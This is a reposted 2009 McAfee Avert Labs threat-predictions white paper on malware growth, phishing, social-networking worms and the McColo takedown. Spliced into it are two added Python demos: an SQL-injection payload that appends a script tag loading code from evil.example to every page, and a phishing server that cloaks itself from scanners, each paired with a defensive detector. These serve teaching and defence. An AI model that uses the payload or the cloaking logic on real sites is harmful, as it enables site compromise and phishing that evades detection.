2009_threat_predictions_report

Description

Technical papers on security and other important technologies.

Shared by: Angela Goodwin
Posted: 1/21/2009
2009 Threat Predictions
White Paper, McAfee Avert Labs, www.mcafee.com
Protect what you value.

Table of Contents
What Has Led to This Explosive Growth?
A Look Ahead at 2009
Threats Hide in the Cloud
Personalized Threats Speak Your Language
Malware Revisited: Partying Like It's 1999
The Rogue Web and Malvertising
McColo: The Effects of a Takedown

2009 Threat Predictions: Slumping economy drives malware threats
By McAfee Avert Labs

This past year was an unprecedented period for threats, and experience teaches us to expect more, and more varied, threats in 2009. We foresaw some of the things that happened in 2008, but we did not expect others. So was 2008 a revolutionary year or an evolutionary one? And what will we see in 2009?

First let's look back at last year. We have seen more malware in the past 12 months than ever before. By the end of 2007, McAfee Avert Labs had identified a little less than 358,000 pieces of malware over a 15-year period; however, more than 135,000 of those were identified in 2007 alone.
By March 2008, we had already identified more malware than in all of 2007. In 2008, Avert Labs identified almost 1.5 million pieces of malware, an average of 3,500 each day. They are stealthy, written with a definite purpose—to make their authors money—and there are a whole lot of them.

[...] continues to be a major source of pain for many businesses and consumers. Adware is fortunately still in decline, and Windows Vista has indeed joined the vulnerability and malware parade. Virtualization, instant messaging threats, and voice over IP (VoIP) are vectors that we continue to keep a very close eye on.

We saw some interesting developments in cyberwarfare as well throughout 2008. The digital events in Georgia and Romania, though not unique, represent a growing movement toward a more cyber-centric battle plan. How will this evolve in 2009 and beyond? Will cyberwarfare replace certain strategies, or is it just a logical extension of a well-planned attack?

Globally, we are experiencing some tough economic times. What effect will this have on malware and other types of cyberthreats? Will tough times lead to more cybercrime? Of course they will. The bad guys watch the same news and read the same headlines that we do. Once the economic crisis began, we soon saw topical messages in phishing attacks, scams, and malware. Lures such as "Your bank was just acquired. Please go to .com to update your account info" or "Earn quick money in tough times as an Internet Financial Manager" appeared almost immediately. Fear is a very effective social-engineering tool in the cybercriminals' kit. Whether it is malware, phishing, scams, spam, or any of the myriad other threats that plague businesses and consumers, we can be certain that much of it will center on the economy and that all of it lines the pockets of global cybercriminals.

What Has Led to This Explosive Growth?

The answer still surprises many people: it's all about money.
Malware is a business, and that business is thriving. Gone are the days of virus writing for notoriety. More than 90 percent of the malware written today consists of password-stealing Trojans and downloaders with one goal in mind: to find your valuable data. The shift from virus writing to a true cybercrime model cannot be overstated. So where will this take us?

When we look back at our 2008 predictions, we find that many of our calls were correct, and in some cases are still playing out. Web 2.0 threats, in particular threats to social networking sites and online gaming, have certainly grown and continue to dramatically affect the landscape today. Parasitic malware piggybacked on other threats, such as USB- and flash memory–based malware, and [...]

A Look Ahead at 2009

Computer users face a dangerous one-two punch today. The current economic crisis is delivering a blow to our financial well-being; at the same time, malware authors are taking advantage of our distraction to deliver a roundhouse strike. Just as we are worrying about the next paycheck or credit card bills, phishing scams offering fast money are growing in quantity. These scams are frequently associated with fake financial and transportation-of-goods websites. Malicious mirror sites of financial and banking targets have phished for their customers for years. With the current global financial troubles, many Internet users, both consumers and businesses, are on the lookout for attractive offers of service, without realizing that cybercriminals are lurking behind the guise of apparently legitimate services:
• Fake financial transaction services
• Fake investment firms
• Fake legal services

Figure 1: Fake investment sites promise to increase your returns, but what they really increase is the bank accounts of the cybercriminals.

We are also seeing a rise in "mule" recruitment sites.
As many people struggle to find profitable work, offers that promise decent pay for only two or three hours of activity from home are quite tempting. More and more spam campaigns are making these offers, but professional-looking websites are also involved in these scams and frauds.

Figure 2: "Mule" sites and emails offer deals that often sound too good to be true. Nonetheless, people continue to fall for these scams.

More surprising, fake sites advertising goods transportation, legal services, and even "financial transaction agents" are blossoming as well. This is a particularly successful time for car-transport offers. Each day, McAfee Avert Labs discovers fake sites proposing such services in Europe, Africa, and the Americas. (See the next four screen captures for examples.) We expect to see more of these various fake service offerings throughout 2009.

Figure 3: Fake websites advertise various service offerings.

Threats Hide in the Cloud

We have become a Web 2.0 world: the Internet is our platform and social networking is spreading like wildfire. Malware authors have also transitioned to the Internet "cloud" as their main delivery vehicle and take advantage of the attractions of Web 2.0. We can expect this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

• Server-side threats—Many years ago, threats often included mutation engines within each binary file. More and more malware authors are moving those engines to the cloud, on the server side, making it significantly more difficult, if not impossible, to reverse-engineer the mutation logic. This also leads to a huge increase in the number of malicious binaries in the world and challenges the way we classify and count those binaries.
• Evasion to cash in—Desktops have become more hardened through defensive policies and protective technologies, and malware authors are taking evasive action. For many years, malware authors have used anti–reverse-engineering tactics, making it more difficult for researchers to describe, classify, and combat threats. In 2008, we saw an increase in malware authors and distributors making it more difficult for security researchers to obtain the malware itself, using tactics such as download thresholds and randomization, referring-URL dependencies, browser and platform restrictions, and the presence of certain cookie properties or values. This trend is likely to continue in 2009, creating a need to monitor and track threats in the real world and in real time, rather than attempting to simulate a user's activities in a lab.

• Browser validation—This year, an increasing number of malicious websites targeted specific web browsers to deliver various payloads and to identify crawling tools. In August, a SQL injection attack was used to rewrite web pages of a compromised website and push a different payload to the website's visitors depending on which browser was being used. Avert Labs saw this technique used many times throughout 2008. With the sharp increase in both SQL injection and cross-site scripting vulnerabilities, we expect this trend to grow in 2009.

Figure 4: SQL injection vulnerabilities by year, 2007 and 2008 (number of matching vulnerabilities and their percentage of all vulnerabilities).
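The "rewrite web pages of a compromised website" step above is the part a defender can reproduce and test for. The following is an added example, not code from McAfee or Avert Labs: a page-hit counter written the way many 2008-era sites were, concatenating an untrusted parameter into SQL on a database that accepts stacked statements (SQLite's executescript stands in for that behaviour here), the same handler parameterized, and a sweep that looks for script tags pointing off-site in the stored pages. The table, page names and the host evil.example are constructed for illustration.

```python
"""SQL injection used to rewrite stored pages, the parameterized fix, and a
check for injected off-site scripts.  Added example; site, pages and hosts
are constructed, not taken from the paper."""
import re
import sqlite3

# Constructed attacker payload: the tag the injected UPDATE appends to every page.
EVIL_TAG = '<script src="http://evil.example/a.js"></script>'


def make_site():
    """A tiny CMS with three stored pages (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id TEXT PRIMARY KEY, body TEXT, "
        "hits INTEGER NOT NULL DEFAULT 0)"
    )
    conn.executemany("INSERT INTO pages (id, body) VALUES (?, ?)", [
        ("home", "<h1>Welcome</h1>"),
        ("about", "<p>About us</p>"),
        ("contact", "<p>Call us</p>"),
    ])
    conn.commit()
    return conn


def count_hit_vulnerable(conn, page_id):
    """The weak handler: untrusted page_id is pasted into the statement and the
    driver runs stacked statements (SQL Server does so by default; executescript
    is the SQLite equivalent)."""
    conn.executescript("UPDATE pages SET hits = hits + 1 WHERE id = '%s';" % page_id)


def count_hit_fixed(conn, page_id):
    """Same handler, parameterized: page_id is bound as a value, never parsed
    as SQL, and execute() refuses more than one statement."""
    conn.execute("UPDATE pages SET hits = hits + 1 WHERE id = ?", (page_id,))
    conn.commit()


# Closes the quoted literal, appends EVIL_TAG to every page body, and comments
# out whatever the handler put after the parameter.
ATTACK_PAGE_ID = "x'; UPDATE pages SET body = body || '%s'; --" % EVIL_TAG

# Host part of an absolute or protocol-relative script src.
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']?(?:https?:)?//([^/\"'>\s]+)", re.I)


def find_injected_scripts(conn, own_hosts):
    """Return (page_id, host) for every stored page that loads a script from a
    host the site does not own: what a post-compromise sweep looks for."""
    found = []
    for page_id, body in conn.execute("SELECT id, body FROM pages ORDER BY id"):
        for host in SCRIPT_SRC.findall(body):
            if host.lower() not in own_hosts:
                found.append((page_id, host))
    return found


def total_hits(conn):
    return conn.execute("SELECT SUM(hits) FROM pages").fetchone()[0]


if __name__ == "__main__":
    weak = make_site()
    count_hit_vulnerable(weak, ATTACK_PAGE_ID)
    print("vulnerable site:", find_injected_scripts(weak, {"www.example"}))
    fixed = make_site()
    count_hit_fixed(fixed, ATTACK_PAGE_ID)
    print("fixed site:", find_injected_scripts(fixed, {"www.example"}))
```

On the vulnerable site the single request rewrites all three pages; on the parameterized one the payload is simply a page id that matches nothing. The sweep is the cheap check to run after any mass-injection campaign: the injected script, not the SQL, is what visitors' browsers will execute, and that script is where per-browser payload selection then happens.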
Figure 5: Cross-site scripting vulnerabilities by year, 2007 and 2008 (number of matching vulnerabilities and their percentage of all vulnerabilities). Source for Figures 4 and 5: National Institute of Standards and Technology, Computer Security Division.

In addition to exploits that take advantage of specific weaknesses, many malicious websites hide themselves when a relatively secure web browser, such as Firefox, is used to view them. By examining the HTTP_USER_AGENT variable (the User-Agent header of the HTTP request), many spam and phishing sites returned missing, empty, or innocuous content if the visiting browser did not match a list of browsers associated with novice users, who are more likely to fall victim to social engineering. These websites also hide themselves from user agents representing automated tools, such as "wget" and "curl", to avoid detection by automated anti-phishing and anti-spam tools. In 2009, we expect this trend to continue, with malicious websites becoming more discriminating about the web browsers to which they reveal themselves. In addition to monitoring the user agent, the browser's query behavior will likely come into play. Crawlers that masquerade as legitimate browsers can easily be identified by their unique scanning for certain filenames or their unique use of query pipelining. As is the case with the pirated software scene, we predict more malicious websites will employ cookies and JavaScript to ensure that the site's visitors are using a legitimate browser.
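A hunter works around this gating by differential fetching: requesting the same URL under several client identities and comparing what comes back. The following is an added example, not code from McAfee or Avert Labs, covering the checks named under "Evasion to cash in" and "Browser validation" as well as the user-agent filtering just described. It stands up a local HTTP server whose gating mirrors those checks (a user-agent allowlist for "novice" browsers, blank and tool user agents refused, a referring-URL dependency and a cookie value), then fetches it under four constructed profiles and flags cloaking when the responses differ. The user-agent patterns, the referrer host webmail.example, the cookie name lure and the page bodies are assumptions for illustration.

```python
"""Cloaking on User-Agent / Referer / Cookie, and a hunter that detects it by
differential fetching.  Added example; patterns and hosts are constructed."""
import hashlib
import http.client
import http.server
import re
import threading

# Attacker side.  Illustrative assumptions, not a real kit's lists.
NOVICE_UA = re.compile(r"MSIE [67]\.0")                  # "novice" browser allowlist
TOOL_UA = re.compile(r"wget|curl|python|libwww", re.I)   # automated scanners

PAGES = {
    "empty": b"",
    "innocuous": b"<html><body>Under construction.</body></html>",
    "phish": b"<html><form action='/login'>Confirm your bank account</form></html>",
}


def cloak_decision(headers):
    """Which page variant a request receives: user-agent allowlist, then a
    referring-URL dependency, then a cookie value the lure's JavaScript sets."""
    ua = headers.get("User-Agent", "") or ""
    if not ua.strip() or TOOL_UA.search(ua):
        return "empty"              # hide from wget/curl and blank agents
    if not NOVICE_UA.search(ua):
        return "innocuous"          # Firefox and friends see a harmless page
    if "webmail.example" not in (headers.get("Referer", "") or ""):
        return "innocuous"          # must arrive from the spam's landing path
    if "lure=1" not in (headers.get("Cookie", "") or ""):
        return "innocuous"          # cookie set by the lure page's JavaScript
    return "phish"


class CloakingHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        body = PAGES[cloak_decision(self.headers)]
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


# Hunter side: the same URL under several identities (constructed profiles).
IE6 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
PROFILES = {
    "curl": {"User-Agent": "curl/7.19.7"},
    "firefox": {"User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:3.0) Gecko/2008 Firefox/3.0"},
    "ie6_direct": {"User-Agent": IE6},
    "ie6_from_lure": {"User-Agent": IE6,
                      "Referer": "http://webmail.example/read?msg=1",
                      "Cookie": "lure=1"},
}


def fetch(host, port, path, headers):
    """Plain http.client GET: no proxy handling, no implicit User-Agent."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", path, headers=headers)
    body = conn.getresponse().read()
    conn.close()
    return body


def differential_fetch(host, port, path="/", profiles=PROFILES):
    """Fetch under each profile; cloaking is flagged when the bodies differ.
    The richest variant (largest, form-bearing) is the one to keep for analysis."""
    bodies = {name: fetch(host, port, path, h) for name, h in profiles.items()}
    digests = {n: hashlib.sha256(b).hexdigest()[:12] for n, b in bodies.items()}
    distinct = len(set(digests.values()))
    richest = max(bodies, key=lambda n: (b"<form" in bodies[n], len(bodies[n])))
    return {"cloaked": distinct > 1, "variants": distinct, "digests": digests,
            "richest_profile": richest, "bodies": bodies}


def run_demo():
    """Start the cloaking server on a free loopback port, probe it, stop it."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), CloakingHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return differential_fetch("127.0.0.1", srv.server_address[1])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    r = run_demo()
    for name, d in r["digests"].items():
        print(f"{name:15s} sha256[:12]={d} bytes={len(r['bodies'][name])}")
    print("cloaked:", r["cloaked"], "richest profile:", r["richest_profile"])
```

Only the profile that looks like an old Internet Explorer arriving from the webmail lure with the cookie set receives the form; the tool user agent gets nothing at all, which is exactly the "missing or empty content" behaviour the paragraph describes. A hunter that fetched once with wget would file the site as dead. In practice the same comparison is extended over source IP and request timing, since the download thresholds mentioned above mean a second fetch from the same address may already be refused.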
Although many of these checks can be overcome with well-written crawlers, a cat-and-mouse game is likely to develop between malicious parties and the developers of scanning tools. These threats stress a further need to work on technologies that can be embedded in a customer's web browser, so that malicious content can be detected while in transit and blocked at the user's desktop.

Advances in exploit frameworks such as FirePack and IcePack have allowed attackers to leverage website vulnerabilities time and time again throughout 2008. This will be the status quo in 2009.

Figure 6: A growing trend last year was the continued piracy of localized software. Cybercriminals know English is not the only language of computing and are looking to capitalize on that fact.

Figure 7: The FirePack framework makes life easier for malware authors.

• Distribution diversity—Fast-flux techniques, in which a single domain uses numerous IP addresses to evade detection, allow attackers to make their threats fault tolerant. If one botnet hub is taken down, for example, another comes online moments later. However, during 2008, the good guys went "upstream" to take down major threat players at the provider level. (See "McColo: The Effects of a Takedown," below.) Fearing a loss in revenue, more bad guys may bite the bullet and build in redundancy through multiple providers. For detailed analyses of fast-flux techniques, refer to the following posts on the Avert Labs Security Blog by our colleague Francois Paget:
º http://www.avertlabs.com/research/blog/index.php/2007/11/30/from-fast-flux-to-rockphish-part-1/
º http://www.avertlabs.com/research/blog/index.php/2007/12/03/from-fast-flux-to-rockphish-part-2/

• Platform validation—In 2008, we saw many advances in techniques and tools to validate the operating system version and browser application version running on remote systems. This approach allows attackers to specifically target vulnerable systems and, just as important, to exclude systems that might be hunting for threats. Threat-hunting systems need to present the right combination of criteria in order to receive a threat. This limitation requires multiple instances of hunter systems, making the process more expensive.

Personalized Threats Speak Your Language

One example of threats taking evasive action against security measures is the existence of single-use binary files. Such binaries are an attacker's equivalent of the single-use credit card numbers consumers use when shopping online. These binaries help create a vast sea of threats, making it harder for victims to describe their assailants and harder for defenders to catch them. This is one driving force behind the parabolic rise in malware discoveries in recent years.

Figure 8: Known malware samples, November 2007 to December 2008. Unique malware binaries have grown by more than 10 million in the past 12 months.

A related trend throughout 2008 was the increasing use of daily and local news events as the lure for social engineering. What better way to get an unsuspecting user to click a link than to use high-visibility news events to tempt them? Users today need to realize that cybercriminals read the same news they do and will very often use those same events against them in spam, scams, and phishing attacks.

Figure 10: Total new event-directed malicious URLs per month, 2008. News events are frequently used as bait to attract the unsuspecting to malicious websites.

Along with the explosive growth of malicious binaries, we've seen a rapid expansion of malware in languages other than English.
Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information. We have also seen great differences in the applications targeted by data thieves in different parts of the world. Cybercriminals have been very quick to pick up local language nuances, differences in local sporting activities, local news in local languages, and many other vectors that allow them to target users in a personal way. There has been a massive shift from global spam, scams, and phishing to attacks that are much more focused on specific populations and geographies.

Figure 9: Growth in non-English-language malware, January 2007 to December 2008. Localized malware and websites have shot up rapidly during the past two years, giving cybercriminals potential access to a global pool of valuable data.

Ten years ago, mass-mailing email worms started to take over as the most insidious threats of the time. Email usage grew at a rapid pace as the dot-com bubble approached the bursting point, and Internet users saw more and more attacks over email. Many fell victim to the persuasive social engineering accompanying these threats, especially when it came to receiving email attachments from regular correspondents. Today, with Web 2.0, history is repeating itself—except this time the unsuspecting victims are users of social networking sites, and malicious email attachments have been replaced with hyperlinks.

Figure 11: Malware websites targeting social networking users per month, 2008. With the growing popularity of social networking sites, malware authors are taking advantage by offering links to "friendly" sites.

Over the years, the likelihood of receiving threats from those in your personal circle largely disappeared.
Malware authors instead concentrated on spam tools, which gave them greater control over their attacks. However, just as floppy-disk threats have been replaced by worms affecting USB flash drives, email attacks are now being replaced with social networking threats. Many virus authors today weren't around during the height of the email-worm troubles. Similarly, a lot of social-networking site users are too young to have endured the Happy99, Melissa, and LoveLetter viruses of nearly a decade ago. Malware authors smell fresh meat, and they're hungry.

One of the most alarming social networking threats in 2008 was the Koobface worm. With more than 1,100 distinct Koobface binaries on record, the authors are aggressively targeting MySpace and Facebook users. One contributing factor to the success of these attacks is that users are often caught off guard when they receive a threat from a friend. Although many people have been affected by Koobface, there are still many more who have yet to realize the dangers of messages received from "friends." The social networking "worm forecast" looks bleak for 2009.

Figure 13: Autorun worm binaries catalogued per quarter, 2007 and 2008. Due to autorun programming, USB and other flash-memory devices have become the new "floppy-disk" threat vector.

Quarter        Autorun worm binaries catalogued
Q1-07          7
Q2-07          155
Q3-07          640
Q4-07          1,793
Q1-08          4,387
Q2-08          4,824
Q3-08          16,299
Q4-08 (est.)   13,324

The Rogue Web and Malvertising

Last year, we also saw the malware underground use mainstream practices in an effort to "sell" software that was either very misleading in its legality or outright fraud. More spam and web-based advertising tempted users with fake offers of security or other bogus software than in years past.
We certainly expect this trend to continue, as there is simply too much money to be made.

Figure 14: New rogue anti-malware sites per month, 2008. Sites offering malicious software labeled as free "antivirus" and "anti-spam" tools often involve multiple binaries and, in many cases, multiple revolving Internet domains and websites.

Figure 12: Unique Koobface binaries per month, July to December 2008. Authors of the Koobface worm have created more than 1,100 binaries in just six months to plague Facebook users.

Malware Revisited: Partying Like It's 1999

In 2008, we saw the continued increase of old-school parasitic file infectors. Avert Labs measured a steady increase in victims of USB and flash-memory viruses. This is a big deal because of the widespread use of removable storage devices: USB sticks, cameras, picture frames, and others. We expect this trend to continue well past 2009. Avert Labs has concerns as well over data leakage and data theft, due to the almost unregulated use of flash storage across enterprise environments as well as its popularity among consumers.

McColo: The Effects of a Takedown

Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corporation. This was a big win for the security community, which fingered McColo as the source of up to 60 percent of worldwide spam. The criminals who used McColo remain at large, and they were back online in a matter of weeks. But the temporary victory is worth celebrating.

Figure 15: Spam messages per minute, weeks 45 through 49. The McColo takedown brought about a significant drop in spam traffic.

The McColo affair marks a sharp change in tactics used by the mostly volunteer community of do-gooders who dedicate their free time to identifying and pursuing cybercriminals around the world. Those individuals are trying to make the Internet a safer place for everyone, and they come from all walks of life. Some are researchers from Internet security companies; others are academics, legal professionals, and, as was the case with McColo, journalists. For many years, these people have worked tirelessly to correlate their data and analyses in attempts to identify the criminals behind most of the high-profile malicious online activity of the past decade, while providing that information to law enforcement for use in prosecution. However, although there have been numerous successes over the years—with many people arrested and successfully prosecuted around the world, often with assistance provided by this ad-hoc volunteer community—those successes have been limited mainly to criminals operating out of Western countries, where cross-border law-enforcement relationships and cooperation are well established and go back many decades. The criminals operating out of countries of the former Soviet Union and China have not shared their fate. Much of this is due to the mistrust and lack of information sharing and collaboration between both the law-enforcement and political leadership of those countries and their Western counterparts. This lack of cooperation has had the effect of providing immunity to criminals operating in those countries and has allowed them to prosper and grow in sophistication virtually unchecked.

However, with McColo and the prior shutdown of two other high-profile, allegedly criminal enterprises—Atrivo and EstDomains—the community has shifted from a mostly passive role of supporting law enforcement with evidence collection and analysis to an active role of working collaboratively with ISPs and global Internet entities such as the Internet Corporation for Assigned Names and Numbers (ICANN) to shine the public light on these malicious actors and shut down their access to network and systems infrastructure. Until now, each shutdown has resulted in a temporary reduction of certain types of cybercrime, such as spam and phishing. The eventual goal of these activities, though, is to substantially increase the costs of "doing business" for the miscreants and adjust the risk-reward equation to such a level that these activities become considerably less profitable and attractive. Time will tell if this strategy will succeed.

Brought to You by McAfee Avert Labs

McAfee Avert Labs is the global research team of McAfee, Inc. With research teams devoted to malware, potentially unwanted programs, host intrusions, network intrusions, mobile malware, and ethical vulnerability disclosure, Avert Labs enjoys a broad view of security. This expansive vision allows McAfee's researchers to continually improve security technologies and better protect the public.

About McAfee, Inc.

McAfee, Inc., headquartered in Santa Clara, California, is the world's largest dedicated security technology company. It delivers proactive and proven solutions and services that secure systems and networks around the world, allowing users to browse and shop the web securely. With its unmatched security expertise and commitment to innovation, McAfee empowers home users, businesses, the public sector, and service providers by enabling them to comply with regulations, protect data, prevent disruptions, identify vulnerabilities, and continuously monitor and improve their security. www.mcafee.com

© 2009 McAfee, Inc. No part of this document may be reproduced without the expressed written permission of McAfee, Inc. The information in this document is provided only for educational purposes and for the convenience of McAfee's customers. The information contained herein is subject to change without notice, and is provided "as is" without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. McAfee, Avert, and Avert Labs are trademarks or registered trademarks of McAfee, Inc. in the United States and other countries. All other names and brands may be the property of others.
5396wp_avert_Threat-Prediction_0109
McAfee, Inc., 3965 Freedom Circle, Santa Clara, CA 95054, 888.847.8766, www.mcafee.com
